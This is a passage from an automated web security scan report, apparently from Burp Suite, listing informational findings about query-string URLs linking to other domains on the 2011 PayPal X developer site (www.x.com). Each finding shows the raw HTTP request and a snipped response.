</noscript>
...[SNIP]...

6.17. https://www.x.com/community/ppx/xspaces/identity

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/identity

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /community/ppx/xspaces/identity?view=documents HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:41 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323236383b31342c323034383b31342c323034393b31342c323131323b31342c323035313b31342c323035333b31342c323030373b31342c323031343b31342c323031313b31342c323030333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:42 GMT; Path=/
Vary: User-Agent
JP: D=183626 t=1313157041875780
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<li>
           <a id="web_pagefooter_privacy" href="https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=ua/Privacy_full&locale.x=en_US">
Privacy            </a>
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...
<noscript>
<img src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript" height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

6.18. https://www.x.com/community/ppx/xspaces/innovate

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/innovate

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /community/ppx/xspaces/innovate?view=documents HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:49 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036323b31342c323035303b31342c323035323b31342c323035373b31342c323036313b31342c323035343b31342c323232343b31342c323236363b31342c323236383b31342c323034393b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:49 GMT; Path=/
Vary: User-Agent
JP: D=115983 t=1313157049401199
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<li>
           <a id="web_pagefooter_privacy" href="https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=ua/Privacy_full&locale.x=en_US">
Privacy            </a>
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...
<noscript>
<img src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript" height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

6.19. https://www.x.com/community/ppx/xspaces/introduce

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/introduce

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /community/ppx/xspaces/introduce?view=documents HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b31342c323036323b31342c323035323b31342c323035303b31342c323035373b31342c323036313b31342c323035343b31342c323232343b31342c323236363b31342c323236383b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:52 GMT; Path=/
Vary: User-Agent
JP: D=99978 t=1313157052571521
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<li>
           <a id="web_pagefooter_privacy" href="https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=ua/Privacy_full&locale.x=en_US">
Privacy            </a>
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...
<noscript>
<img src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript" height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

6.20. https://www.x.com/community/ppx/xspaces/mobile

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/mobile

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /community/ppx/xspaces/mobile?view=documents HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:36 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323035313b31342c323035333b31342c323030373b31342c323031343b31342c323031313b31342c323030333b31342c323030393b31342c323030383b31342c323031303b31342c323031393b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:37 GMT; Path=/
Vary: User-Agent
JP: D=220885 t=1313157037094133
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<li>
           <a id="web_pagefooter_privacy" href="https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=ua/Privacy_full&locale.x=en_US">
Privacy            </a>
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...
<noscript>
<img src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript" height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

6.21. https://www.x.com/community/ppx/xspaces/security

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/security

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /community/ppx/xspaces/security?view=documents HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:55 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323236393b31342c323232313b31342c323235313b31342c323130303b31342c323038343b31342c323036333b31342c323036323b31342c323035323b31342c323035303b31342c323035373b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:56 GMT; Path=/
Vary: User-Agent
JP: D=63485 t=1313157056171515
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<li>
           <a id="web_pagefooter_privacy" href="https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=ua/Privacy_full&locale.x=en_US">
Privacy            </a>
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...
<noscript>
<img src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript" height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

6.22. https://www.x.com/community/ppx/xspaces/social

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/social

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /community/ppx/xspaces/social?view=documents HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:47 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323035323b31342c323035303b31342c323036313b31342c323035373b31342c323035343b31342c323232343b31342c323236363b31342c323236383b31342c323034393b31342c323034383b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:48 GMT; Path=/
Vary: User-Agent
JP: D=112661 t=1313157048041564
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<li>
           <a id="web_pagefooter_privacy" href="https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=ua/Privacy_full&locale.x=en_US">
Privacy            </a>
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...
<noscript>
<img src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript" height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

6.23. https://www.x.com/community/ppx/xspaces/subscriptions

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/subscriptions

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /community/ppx/xspaces/subscriptions?view=documents HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:53 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323232313b31342c323038343b31342c323235313b31342c323130303b31342c323036333b31342c323036323b31342c323035323b31342c323035303b31342c323035373b31342c323036313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:54 GMT; Path=/
Vary: User-Agent
JP: D=202616 t=1313157054314990
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<li>
           <a id="web_pagefooter_privacy" href="https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=ua/Privacy_full&locale.x=en_US">
Privacy            </a>
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...
<noscript>
<img src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript" height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

6.24. https://www.x.com/community/ppx/xspaces/web_checkout

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/web_checkout

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /community/ppx/xspaces/web_checkout?view=documents HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:43 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323035343b31342c323034393b31342c323236383b31342c323034383b31342c323131323b31342c323035313b31342c323035333b31342c323030373b31342c323031343b31342c323031313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:43 GMT; Path=/
Vary: User-Agent
JP: D=151824 t=1313157043372809
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<li>
           <a id="web_pagefooter_privacy" href="https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=ua/Privacy_full&locale.x=en_US">
Privacy            </a>
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...
<noscript>
<img src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript" height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

6.25. https://www.x.com/community/ppx/xspaces/web_checkout/nvp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/web_checkout/nvp

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /community/ppx/xspaces/web_checkout/nvp?view=discussions HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:45 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323035373b31342c323035343b31342c323236363b31342c323232343b31342c323236383b31342c323034393b31342c323034383b31342c323131323b31342c323035313b31342c323035333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:45 GMT; Path=/
Vary: User-Agent
JP: D=173918 t=1313157045591560
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<li>
           <a id="web_pagefooter_privacy" href="https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=ua/Privacy_full&locale.x=en_US">
Privacy            </a>
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...
<noscript>
<img src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript" height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

6.26. https://www.x.com/community/xcommerce-blogs

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /community/xcommerce-blogs?view=blog HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/index.jspa
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323030383b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:38:42 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323237363b31342c323030383b; Expires=Sun, 11-Sep-2011 13:38:43 GMT; Path=/
Vary: User-Agent
JP: D=97775 t=1313156323515835
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<br/>What an exciting time it&rsquo;s been since we <a class="jive-link-external-small" href="https://www.thepaypalblog.com/2011/03/third-paypal-x-developer-challenge-google-android-apps/">first announced</a>
...[SNIP]...
<br/><a class="jive-link-external-small" href="https://market.android.com/details?id=se.mopper.android">Mopper:</a>
...[SNIP]...
<p class="MsoNormal" style="margin-bottom: 0.0001pt;">I&rsquo;m thrilled to let you&#160; know that starting today, X.commerce has <a class="jive-link-external-small" href="https://www.innovateregistration.com/main.aspx">opened&#160; registration</a>
...[SNIP]...
<p class="MsoNormal" style="margin-bottom: 0.0001pt;">Be&#160; sure to <a class="jive-link-external-small" href="https://www.innovateregistration.com/main.aspx">register</a>
...[SNIP]...
">More information will be&#160; available soon on speakers, session tracks and more so stay tuned,&#160; spread the word to your colleagues, follow us on Twitter at @X_commerce&#160; and register at: <a class="jive-link-external-small" href="https://www.innovateregistration.com/main.aspx">https://www.innovateregistration.com/main.aspx</a>
...[SNIP]...

6.27. https://www.x.com/docs/DOC-1106

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1106

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /docs/DOC-1106?decorator=print HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:09 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313130363b3130322c313034313b3130322c313333323b3130322c313433313b3130322c313337343b3130322c313130383b3130322c333833363b3130322c313535313b3130322c333230313b3130322c323234313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:09 GMT; Path=/
Vary: User-Agent
JP: D=137335 t=1313157249447398
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>X Developer Network: Using the Button Manager API [Official]</title>
...[SNIP]...
</samp>, and such), enable you to specify the same HTML variables as you ordinarily do using Website Payments Standard; for information see <a class="jive-link-external-small" href="https://cms.paypal.com/us/cgi-bin/?cmd=_render-content&amp;content_ID=developer/e_howto_html_Appx_websitestandard_htmlvariables">HTML Variables for Website Payments Standard</a>
...[SNIP]...

6.28. https://www.x.com/index.jspa

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /index.jspa

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /index.jspa?ssocancel=true&token=HA-KJ8ZLGBZ3CZ96 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:07 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=68166 t=1313157007904024
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...

6.29. https://www.x.com/people

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /people?view=status&cid=2276 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:24 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=2869310 t=1313157262442054
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...

6.30. https://www.x.com/people/BaldGeek

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/BaldGeek

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /people/BaldGeek?view=profile HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:48 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:51:48 GMT; Path=/
Vary: User-Agent
JP: D=172512 t=1313157108680796
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<li>
           <a id="web_pagefooter_privacy" href="https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=ua/Privacy_full&locale.x=en_US">
Privacy            </a>
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...
<noscript>
<img src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript" height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

6.31. https://www.x.com/tags

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /tags

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /tags?tags=adaptive_payments HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:26 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=213725 t=1313157506462289
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<li>
           <a id="web_pagefooter_privacy" href="https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=ua/Privacy_full&locale.x=en_US">
Privacy            </a>
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...
<noscript>
